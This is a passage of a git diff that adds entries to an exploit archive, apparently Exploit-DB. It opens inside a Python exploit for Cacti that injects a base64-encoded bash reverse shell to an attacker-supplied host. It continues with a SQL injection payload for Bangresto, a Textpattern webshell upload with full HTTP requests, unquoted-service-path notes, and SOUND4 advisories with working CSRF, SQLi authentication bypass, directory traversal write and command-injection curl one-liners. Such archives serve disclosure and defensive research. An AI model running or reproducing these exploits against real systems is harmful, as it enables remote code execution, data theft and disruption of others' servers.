self.random_user_agent()},verify=False,proxies=proxy) + self.rs_host = rs_host + self.rs_port = rs_port + + def exploit(self): + # cacti local ip from the url for the X-Forwarded-For header + local_cacti_ip = self.url.split("//")[1].split("/")[0] + + headers = { + 'X-Forwarded-For': f'{local_cacti_ip}' + } + + revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'" + import base64 + b64_revshell = base64.b64encode(revshell.encode()).decode() + payload = f";echo {b64_revshell} | base64 -d | bash -" + payload = urllib.parse.quote(payload) + urls = [] + + # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell) + for host_id in range(1,100): + for local_data_ids in range(1,100): + urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}") + + for url in urls: + r = self.session.get(url,headers=headers) + print(f"{r.status_code} - {r.text}" ) + pass + + def random_user_agent(self): + ua_list = [ + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0", + ] + return random.choice(ua_list) + +def parse_args(): + import argparse + + argparser = argparse.ArgumentParser() + argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)") + argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True) + argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True) + return argparser.parse_args() + +def main() -> None: + # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL + args = parse_args() + e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port) + e.exploit() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51175.txt b/exploits/php/webapps/51175.txt new file mode 100644 index 000000000..2aba333b5 --- /dev/null +++ b/exploits/php/webapps/51175.txt @@ -0,0 +1,56 @@ +## Exploit Title: Bangresto 1.0 - SQL Injection +## Exploit Author: nu11secur1ty +## Date: 12.16.2022 +## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html +## Demo: https://axcora.my.id/bangrestoapp/start.php +## Software: https://github.com/mesinkasir/bangresto +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto + +## Description: +The `itemID` parameter appears to be vulnerable to SQL injection attacks. +The payload ' was submitted in the itemID parameter, and a database +error message was returned. +The attacker can be stooling all information from the database of this +application. + +## STATUS: CRITICAL Vulnerability + +[+] Payload: + +```MySQL +--- +Parameter: itemID (GET) + Type: error-based + Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) + Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT +(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1 +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto) + +## Proof and Exploit: +[href](https://streamable.com/moapnd) + +## Time spent +`00:30:00` + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51176.txt b/exploits/php/webapps/51176.txt new file mode 100644 index 000000000..35ee8ac59 --- /dev/null +++ b/exploits/php/webapps/51176.txt @@ -0,0 +1,132 @@ +# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Alperen Ergel +# Contact: @alpernae (IG/TW) +# Software Homepage: https://textpattern.com/ +# Version : 4.8.8 +# Tested on: windows 11 xammp | Kali linux +# Category: WebApp +# Google Dork: intext:"Published with Textpattern CMS" +# Date: 10/09/2022 +# +######## Description ######## +# +# Step 1: Login admin account and go settings of site +# Step 2: Upload a file to web site and selecet the rce.php +# Step3 : Upload your webshell that's it... +# +######## Proof of Concept ######## + + +========>>> START REQUEST <<<========= + + + + +############# POST REQUEST (FILE UPLOAD) ############################## (1) + +POST /textpattern/index.php?event=file HTTP/1.1 +Host: localhost +Content-Length: 1038 +sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" +Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/textpattern/index.php?event=file +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin +Connection: close + +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="fileInputOrder" + +1/1 +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="app_mode" + +async +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +2000000 +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="event" + +file +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="step" + +file_insert +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="id" + + +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="_txp_token" + +16ea3b64ca6379aee9599586dae73a5d +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="thefile[]"; filename="rce.php" +Content-Type: application/octet-stream + +"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> +------WebKitFormBoundaryMgUEFltFdqBVvdJu-- + + +############ POST RESPONSE (FILE UPLOAD) ######### (1) + +HTTP/1.1 200 OK +Date: Sat, 10 Sep 2022 15:28:57 GMT +Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 +X-Powered-By: PHP/8.1.6 +X-Textpattern-Runtime: 35.38 ms +X-Textpattern-Querytime: 9.55 ms +X-Textpattern-Queries: 16 +X-Textpattern-Memory: 2893 kB +Content-Length: 270 +Connection: close +Content-Type: text/javascript; charset=utf-8 + +___________________________________________________________________________________________________________________________________________________ + +############ REQUEST TO THE PAYLOAD ############################### (2) + +GET /files/c.php?cmd=whoami HTTP/1.1 +Host: localhost +sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: txp_login_public=4353608be0admin +Connection: close + + +############ RESPONSE THE PAYLOAD ############################### (2) + +HTTP/1.1 200 OK +Date: Sat, 10 Sep 2022 15:33:06 GMT +Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 +X-Powered-By: PHP/8.1.6 +Content-Length: 29 +Connection: close +Content-Type: text/html; charset=UTF-8 + +
alpernae\alperen
+
+ +========>>> END REQUEST <<<========= \ No newline at end of file diff --git a/exploits/windows/local/51159.txt b/exploits/windows/local/51159.txt new file mode 100644 index 000000000..a053be466 --- /dev/null +++ b/exploits/windows/local/51159.txt @@ -0,0 +1,32 @@ +# Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path +# Date: 11/17/2022 +# Exploit Author: Damian Semon Jr (Blue Team Alpha) +# Version: 1.8.5 +# Vendor Homepage: https://masterplus.coolermaster.com/ +# Software Link: https://masterplus.coolermaster.com/ +# Tested on: Windows 10 64x + +# Step to discover the unquoted service path: +wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ + +CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto + +# Info on the service: +C:\>sc qc MPService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MPService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : CoolerMaster MasterPlus Technology Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +#Exploit: +A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. +Ex: (C:\Program.exe) \ No newline at end of file diff --git a/exploits/windows/local/51167.txt b/exploits/windows/local/51167.txt new file mode 100644 index 000000000..1716a60ca --- /dev/null +++ b/exploits/windows/local/51167.txt @@ -0,0 +1,61 @@ +# Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: 4.1.102 + +Summary: SOUND4 Windows Server Service. + +Desc: The application suffers from an unquoted search path issue impacting +the service 'SOUND4 Server' for Windows. This could potentially allow an +authorized but non-privileged local user to execute arbitrary code with +elevated privileges on the system. A successful attempt would require the +local user to be able to insert their code in the system root path undetected +by the OS or other security applications where it could potentially be executed +during application startup or reboot. If successful, the local user's code +would execute with the elevated privileges of the application. + +Tested on: Windows 10 Home 64 bit (build 9200) + SOUND4 Server v4.1.102 + SOUND4 Remote Control v4.3.17 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5721 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php + + +26.09.2022 + +-- + + +C:\>sc qc "SOUND4 Server" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SOUND4 Server + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : SOUND4 Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe" +C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R + + +C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V +4.1.102 \ No newline at end of file diff --git a/exploits/windows/local/51168.txt b/exploits/windows/local/51168.txt new file mode 100644 index 000000000..03b39092c --- /dev/null +++ b/exploits/windows/local/51168.txt @@ -0,0 +1,69 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5722 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php + + +26.09.2022 + +-- + + +PoC: +---- + +
+ +
\ No newline at end of file diff --git a/exploits/windows/local/51169.txt b/exploits/windows/local/51169.txt new file mode 100644 index 000000000..96e5e9728 --- /dev/null +++ b/exploits/windows/local/51169.txt @@ -0,0 +1,165 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application is vulnerable to insecure direct object references +that occur when the application provides direct access to objects based +on user-supplied input. As a result of this vulnerability attackers can +bypass authorization and access the hidden resources on the system and +execute privileged functionalities. + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5723 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php + + +26.09.2022 + +-- + + +(GET|POST) /** HTTP/1.1 + +/var/www/: +---------- + +.SOUND4 +about.php +actioninprogress.php +broken_error.php +cfg_filewatch.xml +cfg_filewatch_specific.xml +checklogin.php +checkserver.php +config.php +datahandlerdlg.php +descrxml.php +dns.php +downloads +downloads.php +fullrebootsystem.php +global.php +globaljs.php +guifactorysettings.xml +guixml.php +guixml_error.php +header.php +images +index.php +isreboot.php +jquery-3.2.1.min.js +jquery-plugins +jquery-ui-custom +jquery-ui-i18n.js +jquery-ui.css +jquery-ui.js +jquery.js +jquery.ui.touch-punch.min.js +killffmpeg.php +linkandshare.php +login.php +logout.php +monitor.php +networkdiagnostic.php +partialrebootsystem.php +ping.php +playercfg.xml +rebootsystem.php +restoreinprogress.php +script.min.js +secure.php +serverinprogress.php +settings.php +setup.php +setup_ethernet.php +style.min.css +traceroute.php +upgrade +upgrade.php +upgradeinprogress.php +uploaded_guicustomload.php +uploaded_kantarlic.php +uploaded_licfile.php +uploaded_logo.php +uploaded_presetfile.php +uploaded_restorefile.php +uploaded_upgfile.php +validate_tz.php +ws.min.js +ws.php +wsjquery-class.min.js +www-data-handler.php + +/usr/cgi-bin/: +-------------- + +(GET|POST) /** HTTP/1.1 + +backup.cgi +cgi-form-data +downloadkantarlic.cgi +ffmpeg.cgi +frontpanel +getlogs.cgi +getlogszip.cgi +guicustomsettings.cgi +guicustomsettingsload.cgi +guifactorysettings.cgi +importpreset.cgi +loghandler.php +logo +logoremove.cgi +logoupload.cgi +phptail.php +printenv +printenv.vbs +printenv.wsf +restore.cgi +restorefactory.cgi +test-cgi +upgrade.cgi +upload.cgi \ No newline at end of file diff --git a/exploits/windows/local/51170.txt b/exploits/windows/local/51170.txt new file mode 100644 index 000000000..253171577 --- /dev/null +++ b/exploits/windows/local/51170.txt @@ -0,0 +1,74 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application allows an unauthenticated attacker to disconnect the +current monitoring user from listening/monitoring and takeover the radio +stream on a specific channel. + +------------------------------------------------------------------------ +/var/www/killffmpeg.php: +------------------------ + +01: +------------------------------------------------------------------------ + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5725 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php + + +26.09.2022 + +-- + + +> curl -sko -nul https://RADIO/killffmpeg.php \ No newline at end of file diff --git a/exploits/windows/local/51171.txt b/exploits/windows/local/51171.txt new file mode 100644 index 000000000..74f65da65 --- /dev/null +++ b/exploits/windows/local/51171.txt @@ -0,0 +1,67 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application suffers from an SQL Injection vulnerability. Input +passed through the 'password' POST parameter in 'index.php' is not properly +sanitised before being returned to the user or used in SQL queries. This +can be exploited to manipulate SQL queries by injecting arbitrary SQL code +and bypass the authentication mechanism. + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5726 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php + + +26.09.2022 + +-- + + +POST /index.php HTTP/1.1 + +username=t00t&password='+joxy--+z \ No newline at end of file diff --git a/exploits/windows/local/51172.txt b/exploits/windows/local/51172.txt new file mode 100644 index 000000000..7aacc6c6f --- /dev/null +++ b/exploits/windows/local/51172.txt @@ -0,0 +1,80 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application suffers from an unauthenticated directory traversal +file write vulnerability. Input passed through the 'filename' POST parameter +called by the 'upgrade.php' script is not properly verified before being used +to upload .upgbox Firmware files. This can be exploited to write to arbitrary +locations on the system via directory traversal attacks. + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5730 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php + + +26.09.2022 + +-- + + +POST /cgi-bin/upload.cgi HTTP/1.1 +Host: RAAAADIOOO +Content-Type: multipart/form-data; boundary=----zzzzz +User-Agent: TheViewing/05 +Accept-Encoding: gzip, deflate + +------zzzzz +Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned" +Content-Type: application/octet-stream + +t00t +------zzzzz +Content-Disposition: form-data; name="submit" + +Do it +------zzzzz-- \ No newline at end of file diff --git a/exploits/windows/local/51173.txt b/exploits/windows/local/51173.txt new file mode 100644 index 000000000..660ad0e56 --- /dev/null +++ b/exploits/windows/local/51173.txt @@ -0,0 +1,75 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application suffers from an unauthenticated OS command injection +vulnerability. This can be exploited to inject and execute arbitrary shell +commands through the 'password' HTTP POST parameter through index.php and +login.php script. + +======================================================================== +/var/www/login.php: +------------------- +09: if (isset($_POST['username']) && isset($_POST['password'])) { +10: +11: $ret = -1; +12: // remarque: Check Password for broken, only admin/admin as valid user/password +13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret); +======================================================================== + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5738 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php + + +26.09.2022 + +-- + + +> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g +uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) \ No newline at end of file diff --git a/exploits/windows/local/51174.txt b/exploits/windows/local/51174.txt new file mode 100644 index 000000000..77479653c --- /dev/null +++ b/exploits/windows/local/51174.txt @@ -0,0 +1,68 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and 